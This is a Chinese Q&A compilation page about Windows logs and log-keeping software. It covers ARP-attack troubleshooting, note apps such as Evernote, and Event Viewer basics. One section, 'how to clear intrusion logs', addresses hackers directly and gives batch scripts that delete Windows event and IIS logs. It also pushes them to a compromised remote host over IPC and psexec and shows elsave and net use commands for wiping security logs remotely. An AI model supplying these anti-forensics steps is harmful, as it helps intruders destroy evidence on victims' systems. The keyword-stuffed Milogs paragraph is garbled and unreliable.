文章导航:
- 1、局域网内总是断网,路由器上系统日志记录有ARP攻击。求指教,应该怎么找出中毒的电脑,比如用什么工具。
- 2、如何清除入侵日志!
- 3、求一款简单的桌面日志软件,方便查询和记录即可?
- 4、求一款可以在桌面上记录日志的软件。看到别人有用过,桌面显示一个月的日期,每天是一个小格子,可以写日
- 5、介绍几款电脑日志软件!谢谢啦!
- 6、用什么软件查看系统日志(比事件查看器更好用)
局域网内总是断网,路由器上系统日志记录有ARP攻击。求指教,应该怎么找出中毒的电脑,比如用什么工具。
安装ColorSoft开发的ARP防火墙(原名Anti ARP Sniffer),该软件通过在系统内核层拦截虚假ARP数据包以及主动通告网关本机正确的MAC地址,可以保障安装该软件的电脑正常上网;拦截外部对本机的ARP攻击和本机对外部的ARP攻击。如果发现内部ARP攻击,直接处理本机就行了;如果发现外部ARP攻击,则根据实际情况通过攻击者的IP地址和/或MAC地址查找该攻击者电脑。
如何清除入侵日志!
一、日志文件的位置
Windows 2000的系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%system32config。
安全日志文件:%systemroot%system32configSecEvent.EVT
系统日志文件:%systemroot%system32configSysEvent.EVT
应用程序日志文件:%systemroot%system32configAppEvent.EVT
有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。
二、清除自己电脑中的日志
如果你要清除自己电脑中的日志,可以用管理员的身份来登录Windows,然后在“控制面板”中进入“管理工具”,再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了,里面有应用程序、安全和系统日志文件。举个例子,比方说你想清除安全日志,可以右键点击“安全日志”,在弹出的菜单中选择“属性”。接下来在弹出的对话框中,点击下面“清除日志”按钮就可以清除了,如果你想以后再来清除这些日志的话,可以将“按需要改写尺寸”,这样就可以在达到最大日志尺寸时进行改写事件了,不会提示你清除日志。
三、清除远程主机上的日志
大多数情况下,IIS的日志会忠实地记录它接收到的任何请求(也有特殊的不被IIS记录的攻击),一个优秀的系统管理员会利用这点来发现入侵的企图,保护自己的系统。所以如果你是黑客,入侵系统成功后第一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单,方法是:新建一个具有如下内容的批处理文件:
@del c:winntsystem32logfiles*.*
@del c:winntsystem32config*.evt
@del c:winntsystem32dtclog*.*
@del c:winntsystem32*.log
@del c:winntsystem32*.txt
@del c:winnt*.txt
@del c:winnt*.log
@del c:del.bat
把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。
接下来再新建一个批处理文件,内容如下:
@copy del.bat \%1c$
@echo 向肉鸡复制本机的del.bat……OK
@psexec \%1 c:del.bat
@echo 在肉鸡上运行del.bat,清除日志文件……OK
保存为clean.bat即可,假设已经与肉鸡进行了Ipc连接,然后在CMD下输入:clean.bat 肉鸡IP,即可清除肉鸡上的日志文件。
清除日志的另外一个方法是借助第三方软件,如著名黑客软件流光的开发者黑客小榕的elsave.exe,就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件,大家可以在网上下载到。elsave.exe使用起来很简单,首先利用获得的管理员账号与对方建立IPC会话:net use \ip pass /user: user,然后在命令行下执行如下命令:elsave -s \ip -l application -C,这样就删除了安全日志。
求一款简单的桌面日志软件,方便查询和记录即可?
推荐记录攻击日志软件你使用Milogs工作日志软件记录攻击日志软件,非常简单灵活地管理日程工作,包括什么安排、项目、任务、客户、联系人、文档,并且还能管理他们之间记录攻击日志软件的多种关联。还可以由你自己定义这些软件的性质,经过您自己定义界面后,可以适用于数十个行业、职业,成为工作日志软件、客户管理软件、项目管理软件、日程安排软件、联系人人脉管理软件等等,这个就看你的具体需求记录攻击日志软件了记录攻击日志软件!
该软件免费就可以使用!!口碑很不错,各大软件下载站都有下载!
求一款可以在桌面上记录日志的软件。看到别人有用过,桌面显示一个月的日期,每天是一个小格子,可以写日
电脑桌面上用于记录的办公软件推荐云便签敬业签:
云便签电脑版上直接在电脑桌面编辑显示记事内容,可随手在电脑桌面上编辑记事。
便签上有日志时间轴列表,所有的记事内容在时间轴上永久保存,误删的记事内容可通过时间轴找回。
在云便签网页版上支持日历总览的功能,可按月按天查看便签上的记事日程。
介绍几款电脑日志软件!谢谢啦!
Evernote
Evernote 在多个平台都很成功,但最成功的领域还是在 iOS 平台。在 iPhone、iPod Touch、iPad 上,Evernote 都属于必备利器。它不仅满足用户现有的记事需求,还会改变用户的记事习惯。我向所有iOS用户推荐Evernote,正如向所有Windows用户推荐Everything。 根据我实际使用Evernote的情况,特对iOS平台更新情况做跟踪和记录,以方便大家。
相关链接:
Evernote官网:evernote.com
Evernote iTunes:链接
Evernote更多文章:xbeta.info/tag/evernote
Evernote iOS v4.0.1, 2011-03-22
(1) iPad 平台 Evernote 新增拍照笔记功能。
改进原因:很明显,此改进是为了发挥 iPad2 新增加的摄像头功能。
应用示例:①携带 iPad2 参加会议,面对白板上的讨论提纲,只要拍照,笔记就自动形成了。② 纸质笔记本的内容,也可以通过摄像头快速传入iPad了。
界面示意:见下图。
(2) iPhone、Touch 平台强化了纯图像笔记的列表显示信息。在笔记列表中,为纯图像笔记了增加标题、日期、地点信息。可参见下图的中间两条笔记。为了便于区分,纯图像笔记的图片会显示在列表的左侧,而普通笔记的图片会显示在右侧。
(3)其他增强 via
xbeta注: 一些用户(包括我)曾遇到过4.0版在iTouch上不太稳定的问题;直接升级到 4.0.1 之后,仍可能不时崩溃——删除旧版,再安装v4.0.1即可解决。
--------------------------------------------------------------------------------
用什么软件查看系统日志(比事件查看器更好用)
还没有更好用的!
如果你已经用上了Windows XP,那么是否意识到不管你是否愿意,操作系统每天都在后台默默无闻地记录下所有的一举一动,相当于忠实的史官“铁笔写春秋”,这就是可以在“控制面板→管理工具”中找到的“事件查看器”,通过它可以了解系统的喜怒哀乐和一言一行,虽然都是一些流水账,但我们既可以从中品尝到成功的喜悦,也可以找到失败的原因,实在是一个忠实的系统助手。
事件查看器能看些什么
事件查看器相当于一本厚厚的系统日志,可以查看关于硬件、软件和系统问题的信息,也可以监视Windows XP的安全事件,下面笔者简单介绍:
提示:除了可以在“控制面板→管理工具”中找到“事件查看器”的踪影外,也可以在“运行”对话框中手工键入“%SystemRoot%\system32\eventvwr.msc /s”打开事件查看器窗口。
1. 应用程序日志
包含由应用程序或系统程序记录的事件,主要记录程序运行方面的事件,例如数据库程序可以在应用程序日志中记录文件错误,程序开发人员可以自行决定监视哪些事件。如果某个应用程序出现崩溃情况,那么我们可以从程序事件日志中找到相应的记录,也许会有助于你解决问题。
2. 安全性日志
记录了诸如有效和无效的登录尝试等事件,以及与资源使用相关的事件,例如创建、打开或删除文件或其他对象,系统管理员可以指定在安全性日志中记录什么事件。默认设置下,安全性日志是关闭的,管理员可以使用组策略来启动安全性日志,或者在注册表中设置审核策略,以便当安全性日志满后使系统停止响应。
发布于 2022-07-14 14:57:58 回复
发布于 2022-07-14 18:57:13 回复